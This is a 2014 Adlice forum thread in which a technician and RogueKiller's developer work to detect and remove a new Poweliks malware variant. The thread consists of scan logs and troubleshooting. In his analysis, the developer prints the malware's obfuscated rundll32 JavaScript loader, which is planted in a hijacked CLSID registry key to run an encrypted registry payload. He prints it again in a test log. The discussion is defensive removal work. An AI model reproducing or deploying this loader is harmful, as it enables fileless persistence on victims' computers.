Adlice forum
Software feedback => RogueKiller => Topic started by: Powdermnky007 on September 13, 2014, 07:33:33 PM
-
Hi, I have a new variant of poweliks / dllhost com surrogate virus. It installed a new version of gigaclicks, I think it was called webcrawler. I think the CPU had 50+ GB of temp Internet files.
I have removed all the superficial viruses and spyware and am left with this new variant I am unable to find or kill. I've been removing viruses for pay for 10+ years. This is the most advanced, well written, virus I've ever seen.
I was hoping to work with you to help your program remove this new variant and I'm also willing to make a donation to you.
I've already run ccleaner, mbam, superantispyware, roguekiller, spybot, eset, MBR scanners, gmer, combofix, adwremover, jrt. I've done sleuthing with process monitor, process explorer, all my normal tricks, but this is one for the experts. Way over my head. I will get some log files posted for you soon. I'm typing this on the ipad.
-
1st scan log with roguekiller (after running several other scans first.
RogueKiller V9.2.10.0 [Jul 11 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : [Admin rights]
Mode : Scan -- Date : 09/12/2014 15:16:31
¤¤¤ Bad processes : 2 ¤¤¤
[Proc.Svchost] svchost.exe -- C:\Windows\SysWOW64\svchost.exe[Tr.Poweliks] dllhost.exe --
¤¤¤ Registry Entries : 32 ¤¤¤
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\KDUpdater ("\\?\C:\Users\KA~1\AppData\Local\Temp\KDUpdSrv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MediaDevSrv ("C:\ProgramData\MediaDev\1405453336\mediadev.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinDevSrv ("C:\ProgramData\Online\sv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\KDUpdater ("\\?\C:\Users\KA~1\AppData\Local\Temp\KDUpdSrv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MediaDevSrv ("C:\ProgramData\MediaDev\1405453336\mediadev.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\WinDevSrv ("C:\ProgramData\Online\sv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\KDUpdater ("\\?\C:\Users\KA~1\AppData\Local\Temp\KDUpdSrv.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\MediaDevSrv ("C:\ProgramData\MediaDev\1405453336\mediadev.exe") -> FOUND
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\WinDevSrv ("C:\ProgramData\Online\sv.exe") -> FOUND
[PUM.Proxy] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> FOUND
[PUM.Proxy] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> FOUND
[PUM.Proxy] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> FOUND
[PUM.Proxy] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> FOUND
[PUM.Proxy] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> FOUND
[PUM.Proxy] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> FOUND
[PUM.Proxy] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> FOUND
[PUM.Proxy] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68 -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68 -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68 -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{13E1ACC4-DBEB-4D93-B7DF-3BD058EDD599} | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68 -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{13E1ACC4-DBEB-4D93-B7DF-3BD058EDD599} | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68 -> FOUND
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{13E1ACC4-DBEB-4D93-B7DF-3BD058EDD599} | DhcpNameServer : 208.67.222.123 208.67.220.123 208.180.42.68 -> FOUND
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> FOUND
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> FOUND
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> FOUND
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> FOUND
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> FOUND
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> FOUND
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://feed.safefinder.com/?p=mKO_AwFzXIpYRak5VLd2-qQdkN5729vVFWxou9ho1IAoH5LYnFv7Ja_9v0r8TquJFYF9qhS3Xfm19_bo2L9xWhvx5KlzRNBqHvWSebEoicZqupluzkeMOQx1wxwQPagjxAqSohT2L2biyurnfowuXgDPHtxkyS9EXXVaL6idWhnuWhfhJFzQOZ6LrTLQlb_r89-cREEfZQ,,&q={searchTerms} -> FOUND
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://feed.safefinder.com/?p=mKO_AwFzXIpYRak5VLd2-qQdkN5729vVFWxou9ho1IAoH5LYnFv7Ja_9v0r8TquJFYF9qhS3Xfm19_bo2L9xWhvx5KlzRNBqHvWSebEoicZqupluzkeMOQx1wxwQPagjxAqSohT2L2biyurnfowuXgDPHtxkyS9EXXVaL6idWhnuWhfhJFzQOZ6LrTLQlb_r89-cREEfZQ,,&q={searchTerms} -> FOUND
[Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\classes\clsid\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} -> FOUND
¤¤¤ Scheduled tasks : 0 ¤¤¤
¤¤¤ Files : 0 ¤¤¤
¤¤¤ HOSTS File : 0 ¤¤¤
¤¤¤ Antirootkit : 0 (Driver: NOT LOADED [0xc000036b]) ¤¤¤
¤¤¤ Web browsers : 0 ¤¤¤
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: +++++
--- User ---
[MBR] 8b7f529e4e506e910378704012a032b3
[BSP] 62239356b31ca9815faf0bbacf458cf0 : HP MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 19014 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 39022592 | Size: 457885 MB
User = LL1 ... OK
User = LL2 ... OK
+++++ PhysicalDrive1: +++++
--- User ---
[MBR] 1f89d61a65b5bd72e00aa30170dbe9fd
[BSP] 33a07a59d299ab4ea9f4ab0156f9d86f : Windows XP MBR Code
Partition table:
0 - [XXXXXX] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 8064 | Size: 3820 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] The request is not supported. )
-
This is the results from a scan I did JUST NOW, after ALL my cleaning efforts and several runs of roguekiller. It still has the dllhost com surrogate thing going on. 22 threads of it active in the task manager right now. I've cleaned all the easy to identify viruses off this computer and am now left with the mother of all viruses lol.
RogueKiller V9.2.10.0 [Jul 11 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : [Admin rights]
Mode : Remove -- Date : 09/13/2014 15:14:44
¤¤¤ Bad processes : 2 ¤¤¤
[Suspicious.Path] (SVC) SASDIFSV -- \??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV64.SYS[Suspicious.Path] (SVC) SASKUTIL -- \??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL64.SYS
¤¤¤ Registry Entries : 34 ¤¤¤
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SASDIFSV (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SASKUTIL (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SASDIFSV (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SASKUTIL (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SASDIFSV (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASDIFSV64.SYS) -> NOT SELECTED
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SASKUTIL (\??\C:\Users\KA~1\AppData\Local\Temp\SAS_SelfExtract\SASKUTIL64.SYS) -> NOT SELECTED
[PUM.Proxy] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> NOT SELECTED
[PUM.Proxy] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> NOT SELECTED
[PUM.Proxy] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> NOT SELECTED
[PUM.Proxy] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable : 1 -> NOT SELECTED
[PUM.Proxy] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> NOT SELECTED
[PUM.Proxy] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> NOT SELECTED
[PUM.Proxy] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> NOT SELECTED
[PUM.Proxy] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : http=127.0.0.1:49992;https=127.0.0.1:49992 -> NOT SELECTED
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | DisableRegistryTools : 0 -> NOT SELECTED
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | DisableRegistryTools : 0 -> NOT SELECTED
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> NOT SELECTED
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> NOT SELECTED
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> NOT SELECTED
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> NOT SELECTED
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> NOT SELECTED
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> NOT SELECTED
[PUM.HomePage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> NOT SELECTED
[PUM.HomePage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> NOT SELECTED
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Start Page : -> NOT SELECTED
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Start Page : -> NOT SELECTED
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> NOT SELECTED
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> NOT SELECTED
[PUM.SearchPage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> NOT SELECTED
[PUM.SearchPage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> NOT SELECTED
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> NOT SELECTED
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-4112444366-2520443925-4103603468-1000\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> NOT SELECTED
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> NOT SELECTED
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> NOT SELECTED
¤¤¤ Scheduled tasks : 0 ¤¤¤
¤¤¤ Files : 0 ¤¤¤
¤¤¤ HOSTS File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost
¤¤¤ Antirootkit : 0 (Driver: LOADED) ¤¤¤
¤¤¤ Web browsers : 0 ¤¤¤
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: +++++
--- User ---
[MBR] 8b7f529e4e506e910378704012a032b3
[BSP] 62239356b31ca9815faf0bbacf458cf0 : HP MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 19014 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 39022592 | Size: 457885 MB
User = LL1 ... OK
User = LL2 ... OK
+++++ PhysicalDrive1: +++++
--- User ---
[MBR] 3477aeb1e884f96c7d3d5d59049f1b1f
[BSP] 33a07a59d299ab4ea9f4ab0156f9d86f : Windows XP MBR Code
Partition table:
0 - [XXXXXX] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 8064 | Size: 15268 MB
User = LL1 ... OK
Error reading LL2 MBR! ([32] The request is not supported. )
============================================
RKreport_DEL_09122014_151650.log - RKreport_DEL_09122014_160623.log - RKreport_DEL_09122014_210551.log - RKreport_SCN_09122014_151631.log
RKreport_SCN_09122014_160500.log - RKreport_SCN_09122014_210510.log - RKreport_SCN_09132014_102907.log
-
hello
Do you know where it resides?
-
No sir. I have NO idea. Nothing can find it. I even booted up into a win 8.1 PE and ran roguekiller with the honey module. Nada.
If possible I would like to work with you, to help your program be able to remove this new variant. Once it gets to this level, it's over my head. Need someone like you to help! Just let me know what you want me to do, or if you have time to pursue. Thank you!
-
Ok, let's start with a OTL log please: http://oldtimer.geekstogo.com/OTL.exe
Let all by default, and run the scan.
Attach the report here.
-
Powermnky007 has the same problem I have with this new variant of "Poweliks". It just keeps eating up HD space until windows reports, "Low disk space on c:". All I know that in the "Auto Start" area in the Registry, there is a non-ascii value that cannot be removed wich contains some wierd characters wich is a "Java" script that start the whole process rolling by calling up rundll32 wich envokes a "Powershell" script and things get worse from there! Malwarebytes reports (2) entries in the registry which it labels as "Poweliks" and said that it removed it but uon reboot, it is there again! I'm going to try whatever it takes to get rid of this thing so hopefully someone - somewhere might have some answers as far as getting rid of this infection for good!
-
worked on the computer all night again tonight... what a waste. Nothing can detect this thing.
internet explorer is broken
windows installer is broken
entries disappearing from start menu
OTL will not open, I get "Exception EOIeSysError in module OTL.exe at b000584A5. Class not registered. I tried 'run as admin' and even googled the error, but no solutions. I believe whatever libraries it uses to run have become damaged.
Even if I do get this virus off, the computer is trashed. I'm probably going to give it another night or two with you, then reformat.
I used FRST or Farbar Recovery Scan Tool and found the following entries which are very suspicious. I attached the log file in it's entirety.
2014-09-17 23:34 - 2014-09-12 22:41 - 00013520 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-17 23:34 - 2014-09-12 22:41 - 00013520 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
-
Ok, anyone who can paste any information on this would be useful.
All I know that in the "Auto Start" area in the Registry, there is a non-ascii value that cannot be removed wich contains some wierd characters wich is a "Java" script that start the whole process rolling by calling up rundll32 wich envokes a "Powershell" script and things get worse from there!
Can you paste the content here?
RogueKillerCMD is able to remove that run key by using the removal by index, but detecting the key would be better.
http://www.adlice.com/poweliks-removal-with-roguekiller/
-
Hello
I have some good news :)
I've found a dropper for that new variant, and indeed a few changes:
- No more RUN key.
- No more HKCU clsid payload, now it's overwriting the same clsid, but in HKLM/HKCR. So there's a loss of windows system data.
- The javascript value has been modified, the content is now obfuscated.
The key is here:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32
* <unicode named subkey>
* default value: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
* a: <encrypted payload>
The original COM server is the file: C:\WINDOWS\system32\wbem\wmiprvse.exe
----------------
Effects:
- At each COM call, instead of having svchost ComLauncher process to call wmiprvse, we call the javascript command, and the infection.
- All COM calls are broken (RogueKiller was hanging on it, but it's now fixed)
- We can't kill the ComLauncher process, just restore the registry key.
I'm building a new version of RogueKiller that fixes it.
-
Wow that's seriously impressive. I have no idea how you figured that out. In my digging last night I found someone else in another forum with the javascript being called from a clsid, just like in your example below.
I did a quick registry search for "javascript:" but no infected keys showed up. I also opened "Autoruns" to check all the start up entries, and again nothing there. BUT if I remember correctly, when I clicked on one of the tabs I got an error. I think it was the WMI tab.
If there is anything you want me to check, post here, run a beta roguekiller, anything, just let me know.
-
RogueKiller new version is online. Please try it.
It can't be in Autoruns, since it's a COM DLL hijack, not a classic autorun entry (a bit like a previous ZeroAccess variant)
-
At work now, I'll be home and able to try the new program in about 10 hours. I'll post here when complete.
Will RogueKiller automatically repair The original COM server is the file: C:\WINDOWS\system32\wbem\wmiprvse.exe
Or is that something I will need to manually do?
-
Nop it will. On my test VM:
[Tr.Poweliks] HKEY_LOCAL_MACHINE\Software\classes\clsid\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32 | : rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) -> REPLACED (C:\WINDOWS\system32\wbem\wmiprvse.exe)
-
Still didn't find anything on mine. I'm wondering if the Poweliks is gone and now my system is just trashed, should I just reformat?
-
can you look manually to see if you see the key above in regedit?
-
I did, there was no weird java key there. Just the normal C:\WINDOWS\system32\wbem\wmiprvse.exe
-
Ok, I think something fixed it before.
Maybe MBAM?